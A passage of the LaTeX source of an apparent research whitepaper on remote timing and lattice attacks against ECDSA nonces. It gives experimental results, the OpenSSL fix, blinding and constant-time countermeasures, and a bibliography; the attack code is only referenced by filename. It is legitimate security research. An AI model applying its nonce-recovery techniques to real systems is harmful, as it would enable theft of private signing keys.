nonces, LLL needs 78. For nonces of 156 bits (7 bits are known), LLL starts needs a minimum of 42 tuples to find the values of the nonces whereas BKZ only needs 38. For nonces of bitsize 155, BKZ needs 30 tuples and LLL needs 31. 1133 | 1134 | \begin{figure}[H] 1135 | \includegraphics[width=\textwidth]{nice_web_plot.png} 1136 | \caption{The number of tuples needed by each algorithms (BKZ and LLL) according to the size of the nonces they can find} 1137 | \end{figure} 1138 | 1139 | As seen in that kind of attacks in the literature, we use $q / 2^{l + 1}$ (with $q$ the modulo and $l$ the MSB (Most Significant Bits) known) for the trick in the embedding strategy. Using other values for the trick often provides worse results (more tuples are needed, or no solutions can be found), and if we do not use the extra dimension we cannot seem to find correct solutions. 1140 | 1141 | \section{Countermeasures} 1142 | 1143 | These kind of ``relaxed'' attacks on DSA and ECDSA are even more problematic on smart-cards, embedded devices and other cryptographic devices that can leak way more information through tons of other Side-Channel analysis. But to attack a remote target, timing attack is still one of the only reliable ways (along with the leak of information different error messages can give away). A relaxed remote attack model where the attacker shares the same machine as the victim can use such techniques as well. Some research has been done in Hypervisors where you can access information about neighbor VM's memory use\cite{flushreload}\cite{flushreloadecdsa}\cite{flushreloadopenssl}. The questions of ``Are there other kinds of side-channel attacks on remote targets?'' and ``Can we get more accurate timings on the network?'' are still open. As for the way of preventing timing attacks, a lot of countermeasures already exist. 1144 | 1145 | \subsection{The OpenSSL Patch} 1146 | 1147 | Let's first take a look at the fix proposed by B.B.Brumley and N.Tuveri following their finding. 1148 | 1149 | \begin{figure}[H] 1150 | \begin{minted}[breaklines,frame=single]{C} 1151 | /* get random k */ 1152 | do 1153 | if (dgst != NULL) { 1154 | if (!BN_generate_dsa_nonce 1155 | (k, order, EC_KEY_get0_private_key(eckey), dgst, dlen, 1156 | ctx)) { 1157 | ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, 1158 | ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED); 1159 | goto err; 1160 | } 1161 | } else { 1162 | if (!BN_rand_range(k, order)) { 1163 | ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, 1164 | ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED); 1165 | goto err; 1166 | } 1167 | } 1168 | while (BN_is_zero(k)); 1169 | 1170 | /* 1171 | * We do not want timing information to leak the length of k, so we 1172 | * compute G*k using an equivalent scalar of fixed bit-length. 1173 | */ 1174 | 1175 | if (!BN_add(k, k, order)) 1176 | goto err; 1177 | if (BN_num_bits(k) <= BN_num_bits(order)) 1178 | if (!BN_add(k, k, order)) 1179 | goto err; 1180 | 1181 | /* compute r the x-coordinate of generator * k */ 1182 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) { 1183 | \end{minted} 1184 | \caption{the patch of B.B.Brumley and N.Tuveri in \textit{crypto/ecdsa/ecs\_ossl.c}} 1185 | \end{figure} 1186 | 1187 | The attack we presented works because some of the nonces are short enough. A solution could be to \textbf{make them all long enough} so that the underlying lattice attack could not happen. This is what B.B.Brumley and N.Tuveri proposed, and is facilitated by the properties of the scalar multiplication in Elliptic Curve Cryptography: 1188 | 1189 | $$ [k]P = [k + r]P \text{ if } r \text{ is a multiple of the group order} $$ 1190 | 1191 | As we will see later, this property is often used as \textbf{scalar blinding} against Side-Channel Attacks. But rather than using a random multiple of the group order which would make extremly large nonces, we can just add the group order to the nonce once. If it's not long enough, the second test will add the group order once again. This will be enough to avoid short nonces all of the time. 1192 | 1193 | \subsection{Blinding} 1194 | 1195 | In 1996, Kocher\cite{Kocher} introduced a timing attack on Diffie-Hellman, RSA and DSA, revant countermeasure: \textbf{blinding}. He explained two ways of using it, either as a base blinding, or as an exponent blinding (although it was shown that under certain conditions exponent blinding alone was not sufficient\cite{schindler}). Both techniques allow the operation to be computed on something unrelated to a malicious user's controlled input.\\ 1196 | 1197 | Below is the \textbf{base blinding} technique applied during a RSA decryption phase with $m = c^d \mod{N}$ where $m$ is the message, $c$ is the ciphertext, $d$ is the private exponent and $N$ the modulus: 1198 | 1199 | \begin{enumerate} 1200 | \item{$r \xleftarrow[]{\$} \mathbb{Z}_N^{\ast}$} 1201 | \item{$m' = (c \cdot r^e)^d \pmod{N}$} 1202 | \item{$m = m' \cdot r^{-1} \pmod{N}$} 1203 | \end{enumerate} 1204 | 1205 | To harden base blinding, \textbf{exponent blinding} can be added. Instead of randomizing the ciphertext, the idea is to randomize the private exponent by adding it to a multiple of $\varphi(N)$: 1206 | 1207 | \begin{enumerate} 1208 | \item{$k \xleftarrow[]{\$} \mathbb{Z}$} 1209 | \item{$d' = c^{d + k \cdot \varphi(N)} \pmod{N}$} 1210 | \item{$m = c^{d'} \pmod{N}$} 1211 | \end{enumerate} 1212 | 1213 | In cryptosystems based on Elliptic Curve Cryptography, other forms of blinding can be used, we will first re-introduce scalar blinding. Here in $Q = [d]P$ we have $P=(x,y)$: 1214 | 1215 | \textbf{Scalar blinding} is the exponent blinding of RSA, in $Q = [d]P$ you hide the private key by adding it to a multiple of the group order. 1216 | 1217 | \begin{enumerate} 1218 | \item{$k \xleftarrow[]{\$} \mathbb{Z}$} 1219 | \item{$k d' = d + k \cdot \#E(\mathbb{F}_q)$ the order of the curve} 1220 | \item{$Q = [d']P$} 1221 | \end{enumerate} 1222 | 1223 | \textbf{Coordinate blinding} is another form of blinding aimed to express calculations in a different projective coordinate every time: 1224 | 1225 | \begin{enumerate} 1226 | \item{$k \xleftarrow[]{\$} \mathbb{Z}$} 1227 | \item{Compute $P = (kx, ky, k)$ expressed by projective coordinates.} 1228 | \item{Compute $[d]P$ using the scalar multiplication algorithm with projective coordinates on the Montgomery-form elliptic curve.} 1229 | \item{Output $[d]P$} 1230 | \end{enumerate} 1231 | 1232 | \textbf{Point blinding} is the base blinding of ECC, in $Q = [d]P$ you hide the base point $P$ by adding it to a random point: 1233 | 1234 | \begin{enumerate} 1235 | \item{$S \xleftarrow[]{\$} E(\mathbb{F}_q)$} 1236 | \item{Compute $S' = [d]S$} 1237 | \item{$Q' = [d](P + S)$} 1238 | \item{$Q = Q' - S'$} 1239 | \end{enumerate} 1240 | 1241 | \subsection{Constant-Time} 1242 | 1243 | Another popular way of preventing against timing attacks is to use Constant-Time algorithms like we have seen with OpenSSL's ECDSA implementation for binary curves. It is also often used for comparing MACs or Signatures together without leaking information on the bytes of the correct string, by failing as soon as a byte is not the same.\\ 1244 | 1245 | Constant-Time exponentiation in modular arithmetic based cryptosystems like DH are done with \textbf{Square-and-Multiply-Always}, which is a modified Square-and-Multiply algorithm that does both operations every time. Here we are decrypting a ciphertext $c$ with the operation $c^d \pmod{N}$ where $d$ is the private key, $|d|$ its binary length and $d_i$ the number at the i-th position of its binary representation. 1246 | 1247 | \DontPrintSemicolon 1248 | \begin{algorithm}[H] 1249 | $s = 1$\; 1250 | \For{$i$ from $|d|-1$ down to $0$}{ 1251 | $s = s * s \mod{N}$ \; 1252 | \lIf{$d_i = 1$}{ 1253 | $s = s \cdot c \pmod{N}$ 1254 | } 1255 | \lElse{ 1256 | $t = s \cdot c \pmod{N}$ 1257 | } 1258 | } 1259 | return $s$\; 1260 | \end{algorithm} 1261 | 1262 | Constant-Time in ECC, usually applied on multiplication operations, are done with the \textbf{Double-and-Add-Always} or the \textbf{Montgomery Ladder} algorithm like in the OpenSSL's ECDSA implementation for binary curves. Both are exactly the same idea as the Square-and-Multiply-Always were dummy operations are made.\\ 1263 | Here is the Montgomery Ladder algorithm: 1264 | 1265 | \begin{algorithm}[H] 1266 | $R_0 = 0$\; 1267 | $R_1 = P$\; 1268 | \For{$i$ from $|d|-1$ down to $0$}{ 1269 | \uIf{$d_i = 0$}{ 1270 | $R_1 = R_0 + R_1$\; 1271 | $R_0 = 2R_0$\; 1272 | } 1273 | \Else{ 1274 | $R_0 = R_0 + R_1$\; 1275 | $R_1 = 2R_1$\; 1276 | } 1277 | } 1278 | return $R0$\; 1279 | \end{algorithm} 1280 | 1281 | \subsection{Others} 1282 | 1283 | We will briefly talk about the other alternatives to the previous two popular ones.\\ 1284 | 1285 | The \textbf{Unified Formula} technique intends to make point addition and point doubling use the same sequence of field operations. It was first invented by Brier and Joye in 2002\cite{unified} and is aiming to cancel the problems brought by the difference of operations occurring in $P + Q$ when $P = Q$.\\ 1286 | 1287 | Another relatively new technique is the \textbf{Padding-Time} technique, which was introduced in 2015 by Boneh, Braun and Jana. The idea is to always take the same amount of time by waiting before doing anything else if an operation did not take as much time as its precedents.\\ 1288 | 1289 | A totally different take on this problem is to get rid of the randomness of the nonces by \textbf{deterministically deriving the nonces from the message and some secret data}. There are two main propositions in this field: the D.J.Bernstein's one with EdDSA\cite{eddsa}, which completely changes ECDSA (uses different curves), and Thomas Pornin's\cite{pornin} one which generate the nonces with HMAC in the ECDSA. 1290 | 1291 | \section{Conclusion} 1292 | 1293 | We have seen in our own experiments that Remote timing attacks are \textbf{far from being practical}, even in the same local network. It already takes advanced measures to attain high precision of timings on the attacker machine, and the fact that we cannot control the jitter, the propagation time and the overall server's responsiveness make things extremely difficult for us.\\ 1294 | 1295 | It's important to notice that the lattice attack should still have \textbf{room for improvement} and more resources would make the timing attack more efficient as well. The detailed and respected description of the TLS protocol would make such a potentially efficient attack particularly easy to perform against any TLS framework/library having such vulnerability.\\ \href{http://blog.cryptographyengineering.com/2012/03/surviving-bad-rng.html}{Some cryptographers} have already advised not to use ECDSA to cryptographically sign objects. The topic is currently a hot one in the \href{http://www.ietf.org/mail-archive/web/cfrg/current/maillist.html}{CFRG mailing list} as what new Signature scheme should become the standard in the years to come. 1296 | 1297 | \newpage 1298 | 1299 | \section*{Acknowledgements} 1300 | 1301 | This work would not have been possible without my two supervisors Tom Ritter and Guilhem Castagnos.\\ 1302 | I also want to thank B.B.Brumley and Paul McMillan for the discussions we had.\\ 1303 | Finally many thanks for the awesome feedback on this whitepaper from Paul Kocher, Brendan McMillion, Christian Belin, Mark Carney, Eloi Vanderbeken and MigMigg. 1304 | 1305 | \newpage 1306 | 1307 | \begin{thebibliography}{1} 1308 | 1309 | \bibitem{ps3} PS3 Nonce Re-use {\em http://www.bbc.com/news/technology-12116051} 1310 | 1311 | \bibitem{Kocher} Paul C. Kocher {\em Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems} 1312 | 1313 | \bibitem{brumley-tuveri} B.B.Brumley and N.Tuveri {\em Remote Timing Attacks are Still Practical} 1314 | 1315 | \bibitem{boneh-venkatesan} D. Boneh and R. Venkatesan {\em Hardness of computing the most significant bits of secret keys in Diffie-Hellman and related schemes} 1316 | 1317 | \bibitem{vanstone} Harper, Menezes, Vanstone {\em Public-Key Cryptosystems with Very Small Key Lengths} 1318 | 1319 | \bibitem{HG-smart} N.A.Howgrave-Graham and N.P.Smart {\em Lattice Attacks on DSA} 1320 | 1321 | \bibitem{dualec} Daniel J. Bernstein, Tanja Lange, and Ruben NiederhagenDual {\em EC: A Standardized Back Door} 1322 | 1323 | \bibitem{babai} László Babai {\em On Lovász' lattice reduction and the nearest lattice point problem} 1324 | 1325 | \bibitem{crosby} Scott A. Crosby, Dan S. Wallach, and Rudolf H. Riedi {\em Opportunities and Limits of Remote Timing Attacks} 1326 | 1327 | \bibitem{chrispeikert} Chris Peikert {\em Lattices in Cryptography, Georgia Tech, Fall 2013: Lecture 2, 3} 1328 | 1329 | \bibitem{logjam} David Adrian, Karthikeyan Bhargavan, J. Alex Halderman, Nadia Heninger, Benjamin VanderSloot, Eric Wustrow, Zakir Durumeric, Pierrick Gaudry, Matthew Green, Drew Springall, Emmanuel Thome,† Luke Valenta, Santiago Zanella-Bégulin, Paul Zimmermann {\em Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice} 1330 | 1331 | \bibitem{coppersmith} Don Coppersmith {\em Finding Small Solutions to Small Degree Polynomials} 1332 | 1333 | \bibitem{lll} Lenstra, A. K.; Lenstra, H. W., Jr.; Lovász, L. (1982). {\em "Factoring polynomials with rational coefficients"} 1334 | 1335 | \bibitem{flushreload} Yarom, Falkner {\em FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack} 1336 | 1337 | \bibitem{ecdsa} Johnson, Menezes, Vanstone {/em The Elliptic Curve Digital Signature Algorithm (ECDSA)} 1338 | 1339 | \bibitem{flushreloadecdsa} Benger, van de Pol, Smart, Yarom {\em “Ooh Aah... Just a Little Bit” : A small amount of side channel can go a long way} 1340 | 1341 | \bibitem{flushreloadopenssl} Yarom, Benger {\em Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack} 1342 | 1343 | \bibitem{schnorr} Schnorr (1989) {\em Efficient Identification and Signatures for Smart Cards} 1344 | 1345 | \bibitem{schindler} Werner Schindler {\em Exclusive Exponent Blinding May Not Suffice to Prevent Timing Attacks on RSA} 1346 | 1347 | \bibitem{pornin} Thomas Pornin {\em Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)} 1348 | 1349 | \bibitem{eddsa} D.J.Bernstein {\em High-speed high-security signatures} 1350 | 1351 | \bibitem{unified} Brier, Joye {\em Weierstraß elliptic curves and side-channel attacks} 1352 | 1353 | \end{thebibliography} 1354 | 1355 | \newpage 1356 | 1357 | \appendix 1358 | 1359 | \section{Timing Attack in C} 1360 | 1361 | \inputminted[breaklines]{c}{attack.c} 1362 | 1363 | \newpage 1364 | 1365 | \section{Lattice Attack in Sage} 1366 | 1367 | \inputminted[breaklines]{sage}{lattice.sage} 1368 | 1369 | \end{document} --------------------------------------------------------------------------------